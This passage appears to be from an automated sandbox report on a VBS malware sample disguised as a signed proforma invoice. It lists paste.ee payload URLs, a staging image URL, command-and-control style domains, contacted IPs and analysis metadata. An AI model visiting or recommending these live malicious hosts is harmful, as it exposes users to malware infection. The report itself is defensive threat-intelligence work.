                                  www.shakishaskakes.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    www.lunazone.us/m07a/true
                                      		low
                                      https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820true
                                        		unknown
                                        http://www.msaway.com/m07a/true
                                          		unknown
                                          http://www.xasvcd.xyz/m07a/true
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.welqi.com/m07a/www.propertiesfinance.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/odirmrexplorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.balancceer.top/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.xasvcd.xyzexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2948630772.0000000010DD9000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932965402.00000000057A9000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.welqi.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.propertiesfinance.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.msaway.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.microsoftpowershell.exe, 00000001.00000002.2263421531.000001DC582E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.qdaoxingsujiao.com/m07a/www.workproapi.siteexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.matchuplover.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.matchuplover.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.auralights.store/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.auralights.storeexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://excel.office.comexplorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.auralights.storeReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://www.google.comwscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.potentpolitics.com/m07a/www.welqi.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.royal-buttons.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.msaway.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.balancceer.topexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.shakishaskakes.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.balancceer.top/m07a/www.auralights.storeexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000006.00000002.2944714584.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1815748916.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.welqi.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		low
                                                                                                          http://www.lunazone.usReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2217742539.000001DC40059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820058355.0000029F05781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.shakishaskakes.com/m07a/www.xasvcd.xyzexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000002.2944714584.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1815748916.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://paste.ee/d/K2No9qShwscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://wns.windows.com/Lexplorer.exe, 00000006.00000000.1815748916.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://word.office.comexplorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://mozilla.org0/colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                          • URL Reputation: malware
                                                                                                                          		unknown
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.google.com;wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		low
                                                                                                                                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.micrexplorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.potentpolitics.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.qdaoxingsujiao.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.potentpolitics.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://lesferch.github.io/DesktopPicwscript.exe, 00000000.00000003.1669979049.000001D666A2F000.00000004.00000020.00020000.00000000.sdmp, Signed Proforma Invoice 3645479_pdf.vbsfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://uploaddeimagens.com.brpowershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                          		unknown
                                                                                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.nacob.topexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://analytics.paste.ee;wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		low
                                                                                                                                                                https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://outlook.com_explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		low
                                                                                                                                                                https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.lunazone.us/m07a/www.balancceer.topexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://www.apexu.xyz/m07a/www.nacob.topexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.workproapi.site/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://schemas.miexplorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://powerpoint.office.comcemberexplorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.royal-buttons.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://www.yipaijihejiaoyu.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://analytics.paste.eewscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://aka.ms/pscore6powershell.exe, 00000001.00000002.2217742539.000001DC3FFDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.microexplorer.exe, 00000006.00000002.2940547809.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2936778344.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1801712063.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.qdaoxingsujiao.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.yipaijihejiaoyu.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://www.yipaijihejiaoyu.com/m07a/www.apexu.xyzexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://www.apexu.xyzexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://www.yipaijihejiaoyu.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://www.propertiesfinance.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://www.auralights.store/m07a/www.potentpolitics.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://www.matchuplover.comReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://www.xasvcd.xyzReferer:explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://www.qdaoxingsujiao.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://api.msn.com/qexplorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://paste.ee/wscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1671154482.000001D664BF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://paste.ee/d/K2No95wscript.exe, 00000000.00000003.1668304258.000001D667264000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672049286.000001D667268000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667597717.000001D667261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://www.nacob.top/m07a/www.matchuplover.comexplorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://www.royal-buttons.com/m07a/explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        172.67.187.200
                                                                                                                                                                                                                        		paste.eeUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        13.107.139.11
                                                                                                                                                                                                                        		dual-spov-0006.spov-msedge.netUnited States
                                                                                                                                                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                        104.21.45.138
                                                                                                                                                                                                                        		uploaddeimagens.com.brUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                        203.161.57.217
                                                                                                                                                                                                                        		www.xasvcd.xyzMalaysia
                                                                                                                                                                                                                        		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                                                                                        3.33.130.190
                                                                                                                                                                                                                        		lunazone.usUnited States
                                                                                                                                                                                                                        		8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                                                                        217.160.0.95
                                                                                                                                                                                                                        		www.msaway.comGermany
                                                                                                                                                                                                                        		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                        Analysis ID:1428347
                                                                                                                                                                                                                        Start date and time:2024-04-18 21:10:22 +02:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 8m 55s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:15
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:Signed Proforma Invoice 3645479_pdf.vbs
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winVBS@17/11@8/6
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 75%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        • Number of executed functions: 49
                                                                                                                                                                                                                        • Number of non-executed functions: 295
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .vbs

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.42.12, 40.127.169.103, 199.232.210.172, 192.229.211.108, 13.85.23.206, 20.242.39.171
